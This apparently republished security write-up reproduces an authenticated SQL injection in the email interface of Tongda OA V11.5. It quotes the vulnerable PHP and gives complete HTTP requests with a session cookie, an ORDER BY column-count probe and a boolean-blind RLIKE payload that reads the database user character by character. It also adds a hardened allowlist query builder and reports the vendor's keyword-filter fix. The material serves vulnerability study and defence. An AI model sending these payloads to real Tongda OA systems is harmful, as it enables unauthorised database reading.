通达OA (Tongda OA) V11.5 Email Interface SQL Injection: Reproduction

Category: Security Articles

Affected versions

通达OA V11.5

Preconditions for exploitation

An authenticated session: the request must carry the cookie of a user who has logged in successfully.

Locating the vulnerable code

The interface maps to the following file:
webroot/general/email/sentbox/get_index_data.php
The vulnerable function is get_sentbox_data, defined in:
webroot/inc/utility_email.php
The relevant code is shown below. The sort column requested by the client arrives here as $FIELD and is concatenated into the ORDER BY clause without any validation; $CURNUM and $PAGE_ZISE are likewise interpolated directly into the LIMIT clause:

$query = "SELECT EMAIL_ID,TO_ID,READ_FLAG,DELETE_FLAG,EMAIL_BODY.BODY_ID,TO_ID2,COPY_TO_ID,TO_WEBMAIL,SUBJECT,SEND_TIME,ATTACHMENT_ID,ATTACHMENT_NAME,IMPORTANT,SIZE,IS_WEBMAIL,WEBMAIL_FLAG from EMAIL,EMAIL_BODY where EMAIL.BODY_ID=EMAIL_BODY.BODY_ID and FROM_ID='" . $_SESSION["LOGIN_USER_ID"] . "' and SEND_FLAG='1' and DELETE_FLAG!='2' and DELETE_FLAG!='4' " . $WHERE_STR . " group by EMAIL.BODY_ID";
if ($FIELD == "") {
    $FIELD = "SEND_TIME";
}
$query .= " order by " . $FIELD;          // $FIELD comes from the request and is appended verbatim: the injection sink
if ($ASC_DESC == "1") {
    $query .= " asc";
} else {
    $query .= " desc";
}
if ($FIELD != "SEND_TIME") {
    $query .= ",SEND_TIME desc";
}
$query .= ",EMAIL_BODY.BODY_ID desc";
$query .= " limit $CURNUM,$PAGE_ZISE";    // paging values are interpolated as well
$cursor = exequery(TD::conn(), $query, $QUERY_MASTER);

Reading this logic in isolation is tedious; in practice, once you have located the interface, the front end builds the request for you. Note that the request captured below is sent to the inbox endpoint (general/email/inbox/get_index_data.php) rather than the sent-box file quoted here; in both cases the orderby parameter is what ends up in the ORDER BY clause.
The UI module that triggers this logic is:
[Personal Affairs] -> [Email] -> [Inbox]
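To make the sink concrete, here is an added example (not code from the original post or from 通达OA) that models the PHP query construction above in Python and places a hardened version of the same builder beside it. The vulnerable builder reproduces the PHP string assembly exactly; the hardened one accepts only an allowlisted sort column, casts the paging values to bounded integers and passes the session user id as a DB-API parameter. ORDER_COLUMNS is an assumed allowlist standing in for whatever sort keys the mailbox UI really offers, and where_str ($WHERE_STR in the PHP) is left as an opaque input because the post does not analyse how it is built.

```python
# Added example: Python model of get_sentbox_data's ORDER BY construction (vulnerable)
# next to a hardened builder. Not code from the original post or from 通达OA.

SELECT_LIST = ("EMAIL_ID,TO_ID,READ_FLAG,DELETE_FLAG,EMAIL_BODY.BODY_ID,TO_ID2,COPY_TO_ID,"
               "TO_WEBMAIL,SUBJECT,SEND_TIME,ATTACHMENT_ID,ATTACHMENT_NAME,IMPORTANT,SIZE,"
               "IS_WEBMAIL,WEBMAIL_FLAG")

# Assumption: the sort keys the UI offers. Only these names may reach ORDER BY.
ORDER_COLUMNS = {"SEND_TIME", "SUBJECT", "SIZE", "IMPORTANT", "READ_FLAG"}


def _base_query(from_id_sql: str, where_str: str) -> str:
    """Everything before ORDER BY; from_id_sql is either a quoted literal (PHP style)
    or a %s placeholder (hardened style). where_str is $WHERE_STR, not analysed here."""
    return ("SELECT " + SELECT_LIST + " from EMAIL,EMAIL_BODY"
            " where EMAIL.BODY_ID=EMAIL_BODY.BODY_ID and FROM_ID=" + from_id_sql +
            " and SEND_FLAG='1' and DELETE_FLAG!='2' and DELETE_FLAG!='4' "
            + where_str + " group by EMAIL.BODY_ID")


def _order_and_limit(field, asc_desc, curnum, page_size) -> str:
    """The tail of the query, assembled exactly as the PHP does it."""
    tail = " order by " + field
    tail += " asc" if asc_desc == "1" else " desc"
    if field != "SEND_TIME":
        tail += ",SEND_TIME desc"
    tail += ",EMAIL_BODY.BODY_ID desc"
    tail += " limit %s,%s" % (curnum, page_size)
    return tail


def vulnerable_query(field, asc_desc, curnum, page_size, login_user_id, where_str=""):
    """Mirrors the PHP: $FIELD (the request's orderby value), $CURNUM and $PAGE_ZISE are
    concatenated verbatim, so any SQL placed in orderby lands inside ORDER BY."""
    if field == "":
        field = "SEND_TIME"
    return (_base_query("'" + login_user_id + "'", where_str)
            + _order_and_limit(field, asc_desc, curnum, page_size))


def hardened_query(field, asc_desc, curnum, page_size, login_user_id, where_str=""):
    """Same query with the sort column restricted to ORDER_COLUMNS, paging values cast to
    bounded integers, and FROM_ID bound as a parameter. Returns (sql, params) for a
    DB-API cursor.execute(sql, params) call. Raises ValueError on anything unexpected."""
    if field == "":
        field = "SEND_TIME"
    if field not in ORDER_COLUMNS:
        raise ValueError("unexpected sort column: %r" % field)
    try:
        curnum, page_size = int(curnum), int(page_size)
    except ValueError:
        raise ValueError("paging values must be integers")
    if curnum < 0 or not 1 <= page_size <= 200:
        raise ValueError("paging values out of range")
    sql = _base_query("%s", where_str) + _order_and_limit(field, asc_desc, curnum, page_size)
    return sql, (login_user_id,)


if __name__ == "__main__":
    payload = "1 RLIKE (SELECT (CASE WHEN(substr(user(),1,1)=0x72) THEN 1 ELSE 0x28 END))"
    print(vulnerable_query(payload, "0", "0", "10", "admin"))
    try:
        hardened_query(payload, "0", "0", "10", "admin")
    except ValueError as e:
        print("rejected:", e)
```

The allowlist is the part that matters: because ORDER BY takes an identifier rather than a value, it cannot be parameterised, so the only robust defence is to map the client's choice onto a fixed set of column names and reject everything else. A blocklist of keywords (the approach the post reports for the later fix) only stops the patterns it knows about.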


The captured sample request:
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=SEND_TIME&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1
Host: 192.168.188.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.188.128/general/email/inbox/?BOX_ID=0&boxname=inbox0&boxid=0
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=381781b3; PHPSESSID=5a0kcudi7nf5ds5f6d8pm3g0v6

PoC: counting the columns

The injection point is the orderby parameter. Without writing any SQL at all, the number of columns in the SELECT list can be determined by probing ORDER BY with an integer: ORDER BY n sorts by the n-th selected column, so the query succeeds while n is at most the column count and MySQL raises an error as soon as n exceeds it.
With orderby=16:
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=16&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1
(remaining headers and cookie identical to the sample request above)
Result (screenshot in the original post): the request succeeds and mailbox data is returned.

With orderby=17:
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=17&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1
(remaining headers and cookie identical to the sample request above)
Result (screenshot in the original post): the request fails.

From these two responses the query selects 16 columns, which matches the 16 fields in the SELECT list of the code quoted above (EMAIL_ID through WEBMAIL_FLAG).

PoC: blind injection

Modify the request as follows (URL-decoded, the orderby value is 1 RLIKE (SELECT (CASE WHEN(substr(user(),1,1)=0x72) THEN 1 ELSE 0x28 END))):
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1+RLIKE+(SELECT+(CASE+WHEN(substr(user(),1,1)=0x72)+THEN+1+ELSE+0x28+END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1
(remaining headers and cookie identical to the sample request above)
Result (screenshot in the original post): the request succeeds, so the first character of user() is 0x72, ASCII 'r'.

Changing 0x72 to 0x73 (ASCII 's'):
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1+RLIKE+(SELECT+(CASE+WHEN(substr(user(),1,1)=0x73)+THEN+1+ELSE+0x28+END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1
(remaining headers and cookie identical to the sample request above)
Result (screenshot in the original post): the request returns an error.

How the SQL works

The original post defers to its earlier write-ups for the detailed walkthrough, since the technique is the same. In short, the orderby value becomes ORDER BY 1 RLIKE (SELECT (CASE WHEN(substr(user(),1,1)=0x72) THEN 1 ELSE 0x28 END)) desc,SEND_TIME desc,.... RLIKE treats its right-hand side as a regular expression. When the comparison is true the subquery yields 1, a valid pattern, and the query runs normally; when it is false it yields 0x28, the single character "(", which is not a valid regular expression, so MySQL aborts the query with an error. Each request therefore answers one yes/no question about one character of user(), and iterating over positions and candidate characters recovers the whole value. Hex literals (0x72 rather than 'r') are used because the backend filters single quotes; a hex literal is a binary string, so the comparison is also case-sensitive.

Follow-up

V11.6 does not fix this issue; the attack still succeeds.
V11.7 fixes it: the parameter is passed through filterWords, and handling for case when-style constructs was added before the SQL is executed. Keep in mind that a keyword blocklist of this kind only stops the patterns it knows about; accepting only a fixed set of column names for the sort field removes the class of bug.



This article was first published on the WeChat public account Pai Sec Team: 通达OA V11.5电子邮箱接口SQL注入复现
